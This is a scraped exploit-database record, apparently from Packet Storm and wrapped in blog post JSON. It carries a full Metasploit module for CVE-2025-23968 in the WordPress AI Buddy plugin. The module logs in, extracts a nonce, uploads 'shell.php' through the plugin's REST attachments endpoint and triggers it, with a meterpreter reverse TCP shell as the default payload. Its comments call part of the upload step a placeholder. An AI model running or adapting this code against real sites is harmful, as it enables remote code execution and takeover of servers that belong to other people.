{“lastseen”:”2025-12-05T18:52:54″,”description”:”WordPress AI Buddy plugin versions 1.8.5 and below remote shell upload exploit that leverages the REST API attachment functionality…”,”published”:”2025-12-05T00:00:00″,”modified”:”2025-12-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress AI Buddy 1.8.5 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:212499″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-23968″],”sourceData”:”=============================================================================================================================================\\n | # Title : AI Buddy WordPress plugin 1.8.5 Universal RCE Exploit Module |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/ai.cibeles.net\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/210977\/ \\u0026 \\tCVE-2025-23968\\n \\n [+] Summary : \\n \\n This module exploits an authenticated arbitrary file upload vulnerability in the\\n AI Buddy WordPress plugin (\\u003c= 1.8.5). The vulnerability allows authenticated attackers\\n to upload PHP webshells via the REST API attachment functionality\\n [+] POC : \\n \\n use exploit\/multi\/http\/wp_ai_buddy_rce\\n \\n set RHOSTS target.com\\n \\n set USERNAME admin\\n \\n set PASSWORD password123\\n \\n exploit\\n \\n ##\\n # AI Buddy Authenticated RCE Module\\n # module for AI Buddy which requires authentication\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::Remote::HTTP::Wordpress\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘WordPress AI Buddy Authenticated RCE’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an authenticated arbitrary file upload vulnerability in the\\n AI Buddy WordPress plugin (\\u003c= 1.8.5). The vulnerability allows authenticated attackers\\n to upload PHP webshells via the REST API attachment functionality.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’, # Metasploit module\\n ‘Ryan Kozak’ # Original discovery\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-23968’],\\n [‘URL’, ‘https:\/\/wpcenter.io\/’],\\n [‘WPVDB’, ‘281518ff-7816-4007-b712-63aed7828b34’]\\n ],\\n ‘Platform’ =\\u003e [‘php’],\\n ‘Arch’ =\\u003e [ARCH_PHP],\\n ‘Targets’ =\\u003e [[‘Universal’, {}]],\\n ‘DisclosureDate’ =\\u003e ‘2025-11-27’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e false,\\n ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’\\n },\\n ‘Privileged’ =\\u003e false,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\\n }\\n )\\n )\\n \\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to WordPress’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘WordPress username’]),\\n OptString.new(‘PASSWORD’, [true, ‘WordPress password’])\\n ])\\n end\\n \\n def check\\n return CheckCode::Unknown(‘Could not connect to target’) unless wordpress_and_online?\\n \\n check_code = check_plugin_version_from_readme(‘ai-buddy’, ‘1.8.6’)\\n \\n if check_code.code == ‘appears’\\n return CheckCode::Appears(\\”Vulnerable AI Buddy version detected: #{check_code.details[:version]}\\”)\\n end\\n \\n CheckCode::Safe(‘AI Buddy not detected or version not vulnerable’)\\n end\\n \\n def exploit\\n # Login to WordPress\\n print_status(\\”Authenticating with WordPress…\\”)\\n \\n cookie = wordpress_login(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n unless cookie\\n fail_with(Failure::NoAccess, ‘Failed to authenticate with WordPress’)\\n end\\n \\n print_good(\\”Successfully authenticated\\”)\\n \\n # Extract AI Buddy nonce\\n nonce = extract_ai_buddy_nonce(cookie)\\n unless nonce\\n fail_with(Failure::Unknown, ‘Could not extract AI Buddy nonce’)\\n end\\n \\n print_good(\\”Extracted nonce: #{nonce}\\”)\\n \\n # Upload webshell via REST API\\n upload_webshell(cookie, nonce)\\n end\\n \\n def extract_ai_buddy_nonce(cookie)\\n print_status(\\”Extracting AI Buddy nonce…\\”)\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘wp-admin’, ‘tools.php’),\\n ‘method’ =\\u003e ‘GET’,\\n ‘cookie’ =\\u003e cookie\\n })\\n \\n unless res\\n fail_with(Failure::Unreachable, ‘Could not access tools.php’)\\n end\\n \\n # Extract nonce from JavaScript\\n if res.body =~ \/var ai_buddy_localized_data = ({.*?});\/m\\n json_data = JSON.parse($1)\\n return json_data[‘ai_buddy_image_post_attachment’][‘nonce’]\\n end\\n \\n nil\\n end\\n \\n def upload_webshell(cookie, nonce)\\n print_status(\\”Uploading webshell via AI Buddy REST API…\\”)\\n \\n php_payload = payload.encoded\\n \\n # For AI Buddy, we use a different approach since it fetches from URLs\\n # We’ll create a simple PHP file that includes our payload\\n webshell_content = \\”\\u003c?php #{php_payload} ?\\u003e\\”\\n \\n # Note: In practice, you’d need to host this file somewhere accessible\\n # For the module, we’ll use a placeholder approach\\n payload_data = {\\n ‘title’ =\\u003e ‘Exploit’,\\n ‘caption’ =\\u003e ‘Test’,\\n ‘alt’ =\\u003e ‘Test’, \\n ‘description’ =\\u003e ‘Test’,\\n ‘url’ =\\u003e ‘https:\/\/raw.githubusercontent.com\/d0n601\/d0n601\/refs\/heads\/master\/test.jpg’,\\n ‘filename’ =\\u003e ‘shell.php’\\n }\\n \\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘wp-json’, ‘ai-buddy’, ‘v1’, ‘wp’, ‘attachments’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘cookie’ =\\u003e cookie,\\n ‘headers’ =\\u003e {\\n ‘X-Wp-Nonce’ =\\u003e nonce,\\n ‘Content-Type’ =\\u003e ‘application\/json’\\n },\\n ‘data’ =\\u003e JSON.generate(payload_data)\\n })\\n \\n unless res\\n fail_with(Failure::Unreachable, ‘No response from REST API’)\\n end\\n \\n if res.code == 200 \\u0026\\u0026 res.body.include?(‘success’)\\n print_good(\\”Webshell uploaded successfully\\”)\\n \\n # Trigger the payload\\n current_year = Time.now.year\\n current_month = Time.now.month.to_s.rjust(2, ‘0’)\\n shell_url = \\”\/wp-content\/uploads\/#{current_year}\/#{current_month}\/shell.php\\”\\n \\n print_status(\\”Triggering payload at #{shell_url}…\\”)\\n send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, shell_url),\\n ‘method’ =\\u003e ‘GET’\\n }, 5)\\n \\n else\\n print_error(\\”Upload failed: #{res.body}\\”)\\n end\\n end\\n end\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212499″,”cvss”:{“score”:9.1,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212499\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-05T18:52:54″,”description”:”WordPress AI Buddy plugin versions 1.8.5 and below remote shell upload exploit that leverages the REST API attachment functionality…”,”published”:”2025-12-05T00:00:00″,”modified”:”2025-12-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress AI Buddy 1.8.5 Shell Upload”,”source”:””,”references”:””,”id”:”PACKETSTORM:212499″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-23968″],”sourceData”:”=============================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-28897","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n